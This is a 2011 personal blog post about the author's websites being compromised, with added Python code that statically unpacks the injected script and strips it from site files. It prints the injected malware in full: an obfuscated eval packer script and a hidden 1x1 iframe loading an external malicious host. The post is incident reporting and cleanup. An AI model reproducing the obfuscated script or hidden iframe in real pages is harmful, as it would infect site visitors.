Chomper Stomping

November 29, 2011

OH SHNIKES, WE’VE BEEN HAXORED!!!

Yes. It finally happened. After… 6 years? on the web I finally got hacked.

Two domains affected:

http://cmcculloh.com

http://hallelujahbutton.com

(this also of course affected all sub-domains of cmcculloh.com, such as blog.cmcculloh.com).

This morning I went to my site and was told by Chrome that I wasn’t allowed to go in because my site was going to infect my machine with H.I.V. (well, not really, but that’s how it felt).

Here’s the screen I saw:

THE VERY FIRST THING I DID WAS GO AND CHANGE ALL OF MY PASSWORDS. I even finally got around to creating multiple users and separating all domains/sub-domains into their own user accounts. This way, if cmcculloh.com gets cracked again, blog.cmcculloh.com will have less chance of also being compromised.

It took me quite a while to figure out what the culprit was (and I’m still not 100% sure), but once I realized that hallelujahbutton.com is exactly one page long it was really easy to find a very likely suspect. This line of code:

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\134\142','g'),k[c]);return p;}('\x56\40\71\75\x55\x20\x54\x28)\73\71\x2EY\50\x39\x2E\130\50)\53\62)\x3BW\50\123.\x4F&\46\151\56u.N\x28\47M\x5C\x52\\c\x3D\47\51\x3D\75-\61\x29\173\x69\x2E\121\x28\'\\\120\134\x34\\\141\x5C\x318\\\x31\67\x5C\61\x36\x5C4\134\162\x5C\70\1341\x62\134\146\134\x62\'\x2B\x30.\x37(0.\x36\50)*\63\53\63\51\53\'\134\142\40h\\\61a\134\x31\x39\134\x31\65\\x\75\x5C\x22\x27\x2B0\x2E\67\x280\x2E\x36\x28\51\523+\x33\51+\47\x5C\42 \x5C\61\61\x5C\145\\10\\Z\134\x6A\\c\x5C\65\\j=\\\42\x5C\61\64\134\"\x5C\61\63\13412\x5C\x44\\\164\x5C5\134f\\\"B\\m\\4\\C\\\112\134n\134I\\o\134\x71\x5C\113\\F\\E\x5Cw\x5C8\x5C\x35\\\x79\\H\134a\x5C\70\x3A\\\x47\x27\530\x2E7\500.\x36\x28\x29*\x33\53\166)+\x27p\x5C\114\x5C\x79\x5C\x41\\\61\x63\134\x31\104\47\x2B\x30\x2E\x37(\x30\x2E6\x28)*\63\53v\x29+\47\\d\x5C\x67\x5C\x22\\1\x43\\\61\105\134f\\\61\x47\x5C\170\\\x38\134\144\72\1341\106\x5C\154\134g\x5C\x31\171\1341\x78\x5C1z\x5C1\102\x5C\61A\134\164.\\\x72\x5C\143\\\x31M\x5C\x6D\56\x31\x50\x5C\x6C\x5C\145\\\x6F\134\x34\134n\134\x31\117\134d\\\x31L\x5C\x31I\x5C\x7A\x5C\61\116\x5Ck\x5C\163\\\61\x4B\x5C\61\112\\\x31\x48\134\61j\\\61\x69\134\61\x6B\\1m\\q\1341l\1345\\1e\134\141\134s\\1\x64\134b\76\134\x31\x66\57\1341\150\134\141\\1\147\x5C\x31\164\x5C\61s\47);i.\165=\x27\x31\165\\\61\x77\x5Cw\\e\x5C\x31v\x5C\153\'+\x30.\67\50\x30.6\50)*\61o\51\53\x27\134\61\x6E\134\61\160\134\65\x5C\147\\\x7A\\\64\134\152\1341\162\134k\47+9.\61\x71\x28)\x7D',62,114,'\115\x61\x74h\174||10\x30\x7C\x78\x36\71|\61\64\65\x7C\x72and\157m|\x66\x6C\157or|\x78\674\174\145xp\x7C\61\64\66|4\x32|\x78\664\174\x316\60\x7C\1706\x44\174\x78\63\x44|1\x370\174\x7C\x64oc\165\x6De\x6Et
\x7Cx\67\62\174\67\x35\x7C5\x37|\170\x37\x33\174x6\x45\x7C1\x34\x31\174\174\170\662\1741\644\1741\x343|\1706\103\174c\157\157\153ie|2\x30\60\174\61\x36\x35\x7C\616\64\174x\63\102\x7Cx\x370\x7C16\x34\x6F\160\174\x70\157\174\x787\64\x69\x7C\6171|1\x35\x34\174\x78\66\106|\655\x7C1\x354\145\x7Cx3A\x7C\615\67\x7C\x3163\174\x78\x378\x7C\x5F_u\174in\144\x65\x78\x4F\146\x7C\x63\157\157\153ieE\156a\142\x6Ce\x64|74\174w\162it\145\174\x78\66\104\x74|\x6E\x61vigat\157r|\104a\x74e\x7C\x6E\x65w\x7Cva\x72\174\x69\146\x7C\x67\x65\164\x44\141t\145|\x73\x65\x74D\141t\145\x7C\170\x362\x6F\174\170\x365\174\170\x36\x36\162\141\174\x31\x36\63\164\x7C\170\620\x7C\x360\174\6150\x7C40\167\x7Cx6D\145\1741\66\x32a\174\x786\x37\x7C1\645\x69|\x78\668\1747\x32|\x365\174x30|x\63\x43|\1707\x32a\x7C\61\x351|x\x33\657\x7C\170\633\x7C\1703\65\x7C\x78\63\x38\174\170\x337\174\x37\63\x7C\7199\719\x399|40\174to\x55\124C\x53t\x72\151ng\x7C\x31\64\65\163|\170\63E\174\x31\x35\x35e\x7C\137|x\674\144|\170\x35F|16\63\155\174x\x36\x31\174\6161\174x69\145|\170\66\64\163\174\x78\62\x30\163r\x7Cx\62D\x7C\x78\66\63|\x78\62F\1744\x32\150\x7Cx3\x31\174\x783\x46\174\x7834\x7C67\x7C\x78\x36\70\x70|1\x35\x36|\x786\x31g\x65\174\65\x36\174\165\x73'.split('|'),0,{}))</script>
<iframe src="http://xmtudaac.cz.cc/?go=1" width="1" height="1"></iframe>

(I added a line break for legibility)

EEEEEWWWW!!!!!! I got pwned!!!

Not 100% sure if it is the iframe *and* the script, or just the iframe.
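What the packed blob actually does can be read without ever running it in a browser. The wrapper is the well-known p,a,c,k,e,d packer: the long quoted string is the real code with every word swapped for a short base-62 token, and the '...'.split('|') list at the end is the table that maps tokens back to words. The browser rebuilds the code by reversing that substitution and then eval()s it. The script below is an added example, not code from this post; it does the reverse substitution statically in Python, including the \x.. and octal escapes the injection hides nearly every byte behind. SAMPLE_SCRIPT is a constructed stand-in with the same wrapper and a made-up word table (the decoded result, an iframe pointing at example.invalid, is invented for the demonstration); to see the real payload, paste the script from above, rejoined onto one line, in its place.

```python
import re

# Alphabet used by the packer's e(c) for bases up to 62: 0-9, a-z, then A-Z
# (the JS does c.toString(36) below 36 and String.fromCharCode(c+29) above).
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# The trailing call of the wrapper: }('<payload>',<base>,<count>,'<words>'.split('|'),0,{}))
PACKER_ARGS_RE = re.compile(
    r"\}\('(?P<p>(?:\\.|[^'\\])*)',(?P<a>\d+),(?P<c>\d+),"
    r"'(?P<k>(?:\\.|[^'\\])*)'\.split\('\|'\),0,\{\}\)\)", re.S)

# JS string escapes: \xHH, \uHHHH, octal \ooo, and single-character escapes.
JS_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|.)', re.S)
SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', 'b': '\b', 'f': '\f', 'v': '\v'}


def decode_js_string(s):
    """Resolve the escapes a JS string literal would resolve."""
    def one(m):
        esc = m.group(1)
        if esc[0] == 'x' and len(esc) == 3:
            return chr(int(esc[1:], 16))
        if esc[0] == 'u' and len(esc) == 5:
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8))
        return SIMPLE_ESCAPES.get(esc, esc)   # \' \\ \" and unknown escapes
    return JS_ESCAPE_RE.sub(one, s)


def encode_token(c, base):
    """Reproduce the packer's e(c): word index -> the short token that replaced it."""
    if not 2 <= base <= 62:
        raise ValueError("this decoder covers the base 10/36/62 packer variants")
    prefix = '' if c < base else encode_token(c // base, base)
    return prefix + ALPHABET[c % base]


def unpack(payload, base, count, words):
    """Undo the substitution statically: every \\w+ token in the payload becomes
    its entry in the word table (or stays itself when that entry is empty)."""
    table = {}
    for i in range(count):
        token = encode_token(i, base)
        table[token] = words[i] if i < len(words) and words[i] else token
    # JS \w is ASCII-only. A word missing from the table is left as-is here;
    # a browser would emit "undefined" for it, which marks a damaged payload.
    return re.sub(r'[A-Za-z0-9_]+', lambda m: table.get(m.group(0), m.group(0)), payload)


def unpack_script(script_text):
    """Pull the arguments out of an eval(function(p,a,c,k,e,d){...}(...)) wrapper
    and return the code the browser would have executed, without evaluating it."""
    m = PACKER_ARGS_RE.search(script_text)
    if m is None:
        raise ValueError("no p,a,c,k,e,d packer call found")
    payload = decode_js_string(m.group('p'))
    words = decode_js_string(m.group('k')).split('|')   # the word table is escaped too
    return unpack(payload, int(m.group('a')), int(m.group('c')), words)


# Constructed sample with the same wrapper as the injected script. The payload and
# word table are made up for this demonstration; the real one differs.
SAMPLE_SCRIPT = r"""<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('\x30 \146=2.3(\'4\');f.5=\'a://b.c/\';f.6=1;f.7=1;2.8.9(f)',62,16,'var|\x7Cdocument|createElement|iframe|src|width|height|body|appendChild|http|example|invalid|||'.split('|'),0,{}))</script>"""

if __name__ == '__main__':
    print(unpack_script(SAMPLE_SCRIPT))
```

Decoding is pure string substitution, so nothing from the payload is executed; that is the property you want when handling something Safe Browsing has already flagged.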

How did I fix it?

I ssh’ed into the server and ran this command: “grep -ir function\(p,a,c,k,e,d\) *”. It found the code in 46 files. I downloaded the entire site and then did a global find/replace in Sublime Text (Ctrl + Shift + H) on the entire script (the one I pasted above) and replaced it with nothing. Then I did a follow-up search on “function(p,a,c,k,e,d)” again to confirm it was cleaned. Then I deleted the contents of my site on the server and re-uploaded everything I wanted up there.
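The grep-then-global-replace pass described above works, but a script can do the same sweep repeatably and also tell you which files were touched and where the hidden frame pointed. The Python below is an added example, not the author’s cleanup. strip_injection removes the <script> wrapping an eval(function(p,a,c,k,e,d)...) call and any empty <iframe> hidden by a 1x1 (or 0x0) size or a display:none / visibility:hidden style, which generalizes the width="1" height="1" frame shown above; clean_tree walks a downloaded copy of the site, keeps the original of each changed file under a backup directory outside the web root, and returns a report. SAMPLE_HTML is a constructed page containing a legitimate embed, the packer wrapper, and the frame from this post; the example.invalid embed and the backup-directory layout are assumptions.

```python
import os
import re
import shutil

# Markers taken from the injection shown in the post: the p,a,c,k,e,d packer
# wrapper and an empty iframe hidden by size or style.
PACKED_SCRIPT_RE = re.compile(
    r'<script\b[^>]*>\s*eval\(function\(p,a,c,k,e,d\).*?</script>', re.S | re.I)
EMPTY_IFRAME_RE = re.compile(r'<iframe\b([^>]*)>\s*</iframe>', re.S | re.I)
ATTR_RE = re.compile(r'([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
HIDDEN_STYLE_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)
WEB_EXTENSIONS = ('.html', '.htm', '.php', '.js')


def parse_attrs(attr_text):
    """Return a lowercase attribute -> value dict for one tag's attribute string."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def _tiny(value):
    """True for width/height values of 1px or less, the sizes used to hide a frame."""
    if value is None:
        return False
    try:
        return float(value.strip().lower().rstrip('px')) <= 1
    except ValueError:          # e.g. "100%"
        return False


def is_hidden_iframe(attr_text):
    attrs = parse_attrs(attr_text)
    if _tiny(attrs.get('width')) and _tiny(attrs.get('height')):
        return True
    return bool(HIDDEN_STYLE_RE.search(attrs.get('style', '')))


def strip_injection(html):
    """Remove the packed script and hidden empty iframes; return (cleaned, findings)."""
    findings = []

    def drop_script(m):
        findings.append(('packed-script', m.start()))
        return ''

    def drop_iframe(m):
        if not is_hidden_iframe(m.group(1)):
            return m.group(0)          # a visible embed is left alone
        findings.append(('hidden-iframe', parse_attrs(m.group(1)).get('src', '')))
        return ''

    cleaned = PACKED_SCRIPT_RE.sub(drop_script, html)
    cleaned = EMPTY_IFRAME_RE.sub(drop_iframe, cleaned)
    return cleaned, findings


def clean_tree(root, backup_dir):
    """Clean every web file under root in place, keeping each original under
    backup_dir (keep that outside the web root so infected copies are never
    served). Returns {relative path: findings} for the files that changed."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 round-trips every byte unchanged, so unknown encodings survive
            with open(path, encoding='latin-1', newline='') as fh:
                original = fh.read()
            cleaned, findings = strip_injection(original)
            if not findings:
                continue
            rel = os.path.relpath(path, root)
            backup = os.path.join(backup_dir, rel)
            os.makedirs(os.path.dirname(backup), exist_ok=True)
            shutil.copy2(path, backup)
            with open(path, 'w', encoding='latin-1', newline='') as fh:
                fh.write(cleaned)
            report[rel] = findings
    return report


# Constructed sample page: one legitimate embed, then the two injected lines.
SAMPLE_HTML = (
    '<html><body><p>Hallelujah!</p>\n'
    '<iframe src="https://example.invalid/embed" width="560" height="315"></iframe>\n'
    '<script type="text/javascript">eval(function(p,a,c,k,e,d){return p}'
    "('x',62,1,'y'.split('|'),0,{}))</script>\n"
    '<iframe src="http://xmtudaac.cz.cc/?go=1" width="1" height="1"></iframe>\n'
    '</body></html>\n'
)

if __name__ == '__main__':
    cleaned, findings = strip_injection(SAMPLE_HTML)
    print(findings)
    print(cleaned)
```

Run it on the local download, eyeball a diff of a couple of the cleaned files, then re-upload as described. Stripping the payload only removes the symptom; the hole it came in through (for this site, per the first comment below, a world-writable directory) has to be closed separately, or the files will simply be rewritten.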

So, how did this happen? Who knows. I definitely wasn’t the only one. I had, within the last week, used a Chrome app called ShiftEdit and given it my FTP credentials, so I initially thought it might have been them somehow. But then I realized that I share my server with at least 100 other sites. Chances are 99% of those people don’t know anything about security, and a good 20 of them probably use “password1” as their password. If any of those people got hacked, it’s just a small step once you’re on the box to wrangle root access and run a shell script that eats HTML documents and poops them out with your script inside of them (no, I don’t know how to do this, but I could most likely be doing it by the end of the week were I so nefariously inclined. It’s not hard. USE A GOOD PASSWORD and DON’T REUSE IT ACROSS SITES).

So, anywho, I have cleaned my site and submitted my site to Google for verification so that we can get this error page back down. DON’T click the “proceed anyway” link. Because I’m just a guy and I could still be infected and not know it. Always just click the “go back” button. Once Google has OK’d it, the site will become available (as hallelujahbutton.com now has).

THANK YOU GOOGLE!!! YOU’RE AWESOME!!! Except that I *really* wish your error pages were more specific on EXACTLY what the problem was instead of making me hunt and hunt for it.

Also, I’ve deleted hallelujahbutton.com and set the domain name to expire. I completely forgot it existed and am too busy to want to deal with it anymore so, pruned!



About the Author

Christopher McCulloh
E-Commerce developer at Finish Line. Co-author of HTML, XHTML and CSS All-in-One Desk Reference for Dummies. Graduated from IU with a Bachelor’s of Media Arts and Science and a Certificate in Applied Computer Science. Tech editor for Building Facebook Applications for Dummies and Building Websites All-in-One for Dummies, 2nd Edition. Creator and maintainer of the Status-bar Calculator Firefox extension. Three years’ professional experience in Java e-commerce development and four years’ professional experience with PHP, for a combined total of seven years’ professional JavaScript/HTML/CSS experience.

2 Comments


  1. Also, Dreamhost found the hole (a directory I somehow ridiculously had set to 777 permissions) and recommended I run this command at the root directory level of my site:

    find . -perm 777 -type d -print -exec chmod 755 {} \;

    This changes any directories having 777 permissions to have 755 permissions.


  2. Oh God… I also faced this issue a few months ago :-( But I didn’t know how to solve it, so I deleted all the WordPress files and installed again, but the problem still existed. So I contacted my hosting provider. They told me that the malware had affected all the files and some hidden configuration files; my .htaccess file was completely edited by the hackers! So the hosting provider deleted the account and re-created it. Then I did a fresh install, and everything works fine. Now my blog is running with high protection… I use a very effective plugin for security. Sorry for my language.

    akhil.
